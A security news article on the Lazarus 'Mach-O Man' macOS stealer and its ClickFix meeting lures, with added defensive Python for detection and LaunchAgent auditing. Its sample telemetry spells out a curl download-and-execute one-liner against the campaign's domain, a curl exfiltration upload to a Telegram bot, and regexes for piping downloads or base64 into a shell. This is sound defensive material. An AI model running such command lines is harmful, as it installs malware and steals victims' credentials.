CyberSecurityNews

Mach-O Man macOS Malware Targets Crypto and Fintech Users


North Korea’s state-sponsored Lazarus Group has unleashed a newly identified, modular macOS malware kit dubbed “Mach-O Man”: a four-stage attack chain that targets fintech executives, crypto developers, and high-value enterprise users through fake meeting invitations and related social engineering lures.

Analyzed by Mauro Eldritch in collaboration with ANY.RUN’s interactive sandbox platform, Mach-O Man is a Go-compiled malware kit delivered as native Mach-O binaries that run on both Intel and Apple Silicon Macs.


Zoom logo displayed on the fake Teams App 

Attributed to Lazarus’s Chollima division, the kit marks a significant escalation in the group’s targeting of Apple ecosystems, a platform historically perceived as more secure but increasingly in the crosshairs of state-sponsored threat actors.

Since 2017, Lazarus has accumulated approximately $6.7 billion in stolen crypto assets, and researchers have already linked over $500 million in recent exploits to this group’s activity.

Mach-O Man Attacking macOS Users

The attack begins not with a software exploit, but with a deceptively simple social engineering technique known as ClickFix.

Victims, typically business leaders in Web3, fintech, or crypto circles, receive an urgent Telegram message from a compromised or impersonated contact, containing what appears to be a legitimate invitation to a Zoom, Microsoft Teams, or Google Meet session.

The link redirects to a convincing fake collaboration platform (e.g., update-teams[.]live or livemicrosft[.]com) that displays a simulated connection error, prompting the user to paste and execute a terminal command to “fix” the issue.

Most modules present faulty functions or unexpected errors

That single terminal command silently deploys teamsSDK.bin, the kit’s initial stager.
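The ClickFix step leaves a distinctive trace: a human pastes a download-and-execute one-liner into a GUI terminal. The following is an added detection example (not code from the ANY.RUN / Mauro Eldritch analysis) that runs three command-line heuristics over process telemetry. The event records, their field names (ts, parent, cmdline) and the exact command lines are constructed for illustration; only the teamsSDK.bin name and the update-teams[.]live domain come from the campaign write-up.

```python
"""Flag ClickFix-style download-and-execute command lines in process telemetry.

Added example (not code from the ANY.RUN / Mauro Eldritch analysis). The event
records and their field names (ts, parent, cmdline) are constructed to stand in
for a generic EDR command-line export; they are not a real product schema.
"""
import re

INTERPRETERS = r"(?:ba|z|da)?sh|python3?|perl|osascript"

RULES = {
    # Remote fetch piped straight into an interpreter: curl ... | bash
    "download_piped_to_shell": re.compile(
        rf"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:{INTERPRETERS})\b"),
    # Fetch, mark executable, and run, all in one pasted line
    "download_chmod_exec": re.compile(
        r"\b(?:curl|wget)\b.*?\bchmod\s+\+x\b.*?(?:&&|;)\s*\S*/\S+"),
    # Payload decoded on the fly and fed to a shell: ... | base64 -d | sh
    "base64_decode_to_shell": re.compile(
        rf"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:{INTERPRETERS})\b"),
}

# GUI terminals a user pastes into; a hit here means a human typed or pasted it.
INTERACTIVE_TERMINALS = {"Terminal", "iTerm2", "Warp", "Hyper"}


def classify(event):
    """Return the list of rule names the event's command line triggers."""
    hits = [name for name, rx in RULES.items() if rx.search(event["cmdline"])]
    if hits and event.get("parent") in INTERACTIVE_TERMINALS:
        hits.append("pasted_into_interactive_terminal")
    return hits


def scan(events):
    """Return (ts, hits) for every event that triggers at least one rule."""
    return [(e["ts"], classify(e)) for e in events if classify(e)]


# Constructed sample telemetry. The teamsSDK.bin name and update-teams[.]live
# domain come from the campaign write-up; the command lines themselves are made up.
SAMPLE_EVENTS = [
    {"ts": "10:01:12", "parent": "Terminal", "cmdline": "git pull origin main"},
    {"ts": "10:03:40", "parent": "Terminal",
     "cmdline": 'curl -fsSL "https://update-teams[.]live/teamsSDK.bin" '
                "-o /tmp/teamsSDK.bin && chmod +x /tmp/teamsSDK.bin && /tmp/teamsSDK.bin"},
    {"ts": "10:05:02", "parent": "Terminal",
     "cmdline": "echo ZWNobyBoaQ== | base64 -d | sh"},   # blob decodes to 'echo hi'
    {"ts": "10:06:15", "parent": "launchd",
     "cmdline": "curl -s https://example.invalid/health | sh"},  # scripted, not pasted
]

if __name__ == "__main__":
    for ts, hits in scan(SAMPLE_EVENTS):
        print(ts, ", ".join(hits))
```

The interactive-terminal parent is deliberately an additional tag rather than a filter: a scheduled `curl | sh` is worth a lower-severity alert, while the same pattern with a GUI terminal as parent is the ClickFix signature the article describes.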

Once execution begins, Mach-O Man operates across four distinct phases:

Stage 1 – The Stager (teamsSDK.bin): Downloads a fake macOS application bundle impersonating Zoom, Teams, or Google Meet and applies an ad-hoc code signature. That signature satisfies Apple Silicon’s requirement that native code be signed without involving any developer identity; Gatekeeper is sidestepped separately, because a file fetched from a terminal command rather than a browser carries no quarantine attribute and is never evaluated. The stager then prompts the victim for their password three times, shaking the window on the first two attempts to simulate authentication failures before silently accepting the credentials.

Stage 2 – The Profiler (D1YrHRTg.bin / variants): Registers the host with the C2 server and collects a comprehensive system profile — including hostname, CPU type, boot time, OS version, running processes, network configuration, and a full inventory of installed browser extensions across Chrome, Firefox, Safari, Brave, Opera, and Vivaldi.

Most modules contain a usage message

Stage 3 – Persistence (minst2.bin): Creates a folder named “Antivirus Service,” drops a binary disguised as OneDrive, and installs a LaunchAgent (com.onedrive.launcher.plist) to ensure the malware kit re-executes on every login.

Stage 4 – The Stealer (macrasv2): Harvests browser credentials, session cookies, SQLite-stored data, and macOS Keychain entries, packages everything into user_ext.zip, and exfiltrates it via the Telegram Bot API — a trusted channel that blends into normal traffic. A self-deletion script (delete_self.sh) then wipes all components using the native rm command.

Despite the campaign’s sophistication, researchers identified notable OPSEC weaknesses. The operators exposed their Telegram bot token, and whoever holds a bot token can call the Bot API as that bot, so third parties could read the bot’s messages, send messages on its behalf, and even identify the operator, significantly aiding takedown efforts.


Telegram Bot/API Key is leaked

Several modules also contain faulty logic, including a profiler component that enters an infinite loop, repeatedly posting system data to the C2, and potentially triggering resource exhaustion alerts on the victim’s machine.
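Both weaknesses above are easy to turn into analyst tooling. The following is an added example (not code from the ANY.RUN / Mauro Eldritch analysis): it pulls Telegram bot tokens out of a strings dump using the public token shape, builds the Bot API URLs a leaked token exposes, redacts the secret half before the line lands in a ticket, and flags the looping profiler by finding one host re-issuing an identical upload command within a short window. The strings dump, the token, and the command-line events are all constructed; only the user_ext.zip and delete_self.sh names and the Telegram channel come from the write-up.

```python
"""Spot leaked Telegram bot tokens and the looping profiler's repeated uploads.

Added example, not code from the ANY.RUN / Mauro Eldritch analysis. The strings
dump and the command-line events are constructed; the token is fake and the
api.telegram.org URLs only follow the public Bot API shape.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Telegram bot tokens are "<numeric bot id>:<35 chars of [A-Za-z0-9_-]>".
TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}):([A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")


def find_bot_tokens(blob):
    """Return every bot token embedded in a strings dump or log line."""
    return [m.group(0) for m in TOKEN_RE.finditer(blob)]


def redact_token(text):
    """Keep the bot id (useful for clustering samples) but hide the secret half."""
    return TOKEN_RE.sub(lambda m: f"{m.group(1)}:<redacted>", text)


def bot_api_url(token, method):
    """Bot API endpoint; getMe / getUpdates are what a leaked token exposes."""
    return f"https://api.telegram.org/bot{token}/{method}"


def repeated_uploads(events, threshold=3, window=timedelta(minutes=5)):
    """Find an identical command line from one host repeated >= threshold times
    inside `window`, the signature of the profiler's infinite posting loop."""
    by_key = defaultdict(list)
    for e in events:
        key = (e["host"], " ".join(e["cmdline"].split()))   # normalise whitespace
        by_key[key].append(datetime.fromisoformat(e["ts"]))
    findings = []
    for (host, cmd), times in by_key.items():
        times.sort()
        lo = 0
        for hi in range(len(times)):          # sliding window over sorted times
            while times[hi] - times[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                findings.append({"host": host, "count": len(times),
                                 "cmdline": redact_token(cmd)})
                break
    return findings


FAKE_TOKEN = "1234567890:AAF_CONSTRUCTED_TOKEN_FOR_DEMO_0123"   # constructed, not real

# Constructed `strings` output from a stealer-like binary.
STRINGS_DUMP = f"""
user_ext.zip
{bot_api_url(FAKE_TOKEN, "sendDocument")}
delete_self.sh
"""

# Constructed process events: the same curl upload fired every few seconds.
UPLOAD_CMD = ('curl -s -F chat_id=42 -F "document=@/tmp/profile.json" '
              + bot_api_url(FAKE_TOKEN, "sendDocument"))
EVENTS = [
    {"ts": "2025-01-01T10:00:00", "host": "mbp-cfo", "cmdline": UPLOAD_CMD},
    {"ts": "2025-01-01T10:00:07", "host": "mbp-cfo", "cmdline": UPLOAD_CMD},
    {"ts": "2025-01-01T10:00:15", "host": "mbp-cfo", "cmdline": UPLOAD_CMD},
    {"ts": "2025-01-01T10:00:22", "host": "mbp-cfo", "cmdline": UPLOAD_CMD},
    {"ts": "2025-01-01T10:30:00", "host": "mbp-dev",
     "cmdline": "curl -s https://example.invalid/ping"},
]

if __name__ == "__main__":
    for tok in find_bot_tokens(STRINGS_DUMP):
        print("leaked token ->", bot_api_url(redact_token(tok), "getMe"))
    for f in repeated_uploads(EVENTS):
        print(f)
```

Whether to actually call getMe or getUpdates with a recovered token is a legal and operational decision, not a technical one; the code above only constructs the URLs. The redaction keeps the numeric bot id so that samples sharing a bot can still be clustered without spreading the secret.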

Repeated curl commands posting the same file 

Security teams should treat any unexpected terminal command prompt, even one embedded in a seemingly routine meeting workflow, as a high-confidence social engineering indicator.

SOC teams are advised to audit LaunchAgents for entries that borrow a vendor name (such as com.onedrive.launcher.plist) but launch a binary from an unusual location like an “Antivirus Service” folder, to alert on terminal-launched download-and-execute command lines of the kind ClickFix lures rely on, and to use sandboxing tools that can execute and observe macOS-native Mach-O binaries rather than only Windows samples.
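The LaunchAgent audit suggested above, and the Stage 3 artefact it looks for, as an added example (not code from the ANY.RUN / Mauro Eldritch analysis). It parses each plist with the standard library, and the heuristics (vendor-sounding Label, program outside standard install paths, an “Antivirus Service” folder, RunAtLoad plus KeepAlive on a non-standard binary) are this example’s own reading of the described persistence. The two plists are constructed in memory so the code runs anywhere; `audit_directory` is the function you would point at ~/Library/LaunchAgents on a real Mac.

```python
"""Audit macOS LaunchAgent plists for Mach-O Man-style persistence.

Added example, not code from the ANY.RUN / Mauro Eldritch analysis. The two
plists below are constructed in memory; the heuristics are this example's own,
derived from the Stage 3 behaviour described in the article.
"""
import plistlib
from pathlib import Path

# Where legitimately installed software normally lives.
STANDARD_PREFIXES = ("/Applications/", "/System/", "/usr/", "/Library/Apple/", "/opt/homebrew/")
# Brands the kit impersonates; a Label borrowing one deserves a closer look.
IMPERSONATED = ("onedrive", "microsoft", "teams", "zoom", "google", "antivirus")


def audit_launch_agent(plist_bytes, source="<memory>"):
    """Return a list of finding strings for one LaunchAgent plist."""
    d = plistlib.loads(plist_bytes)
    label = str(d.get("Label", ""))
    args = d.get("ProgramArguments") or []
    program = str(d.get("Program") or (args[0] if args else ""))
    non_standard = not program.startswith(STANDARD_PREFIXES)
    findings = []
    if "antivirus service" in program.lower():
        findings.append(f"{source}: program lives in an 'Antivirus Service' folder ({program})")
    if any(w in label.lower() for w in IMPERSONATED) and non_standard:
        findings.append(f"{source}: vendor-style Label {label!r} runs {program} outside standard install paths")
    if d.get("RunAtLoad") and d.get("KeepAlive") and non_standard:
        findings.append(f"{source}: RunAtLoad+KeepAlive on a non-standard binary ({program})")
    return findings


def audit_directory(directory=Path.home() / "Library" / "LaunchAgents"):
    """Audit every *.plist in a LaunchAgents directory (for a real run on a Mac)."""
    results = {}
    for p in Path(directory).glob("*.plist"):
        try:
            results[str(p)] = audit_launch_agent(p.read_bytes(), str(p))
        except (plistlib.InvalidFileException, ValueError) as exc:
            results[str(p)] = [f"{p}: unparseable plist ({exc})"]
    return results


# Constructed plists. The first mirrors the reported persistence artefact
# (com.onedrive.launcher.plist pointing at a fake OneDrive binary in an
# 'Antivirus Service' folder); the second is a benign Homebrew-style service.
SUSPICIOUS_PLIST = plistlib.dumps({
    "Label": "com.onedrive.launcher",
    "ProgramArguments": ["/Users/victim/Library/Antivirus Service/OneDrive"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "homebrew.mxcl.redis",
    "ProgramArguments": ["/opt/homebrew/opt/redis/bin/redis-server"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

if __name__ == "__main__":
    for f in audit_launch_agent(SUSPICIOUS_PLIST, "com.onedrive.launcher.plist"):
        print(f)
    print("benign findings:", audit_launch_agent(BENIGN_PLIST, "homebrew.mxcl.redis.plist"))
```

Run the same function over /Library/LaunchAgents and /Library/LaunchDaemons as well; the kit described here uses a per-user agent, but the label-versus-path mismatch is equally telling at system scope.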

A single compromised macOS device in a fintech or crypto environment can provide access to production infrastructure, SaaS platforms, and digital asset wallets, which makes early detection critical: once credential data has been exfiltrated, the only remaining remedy is rotating every secret the host could reach.



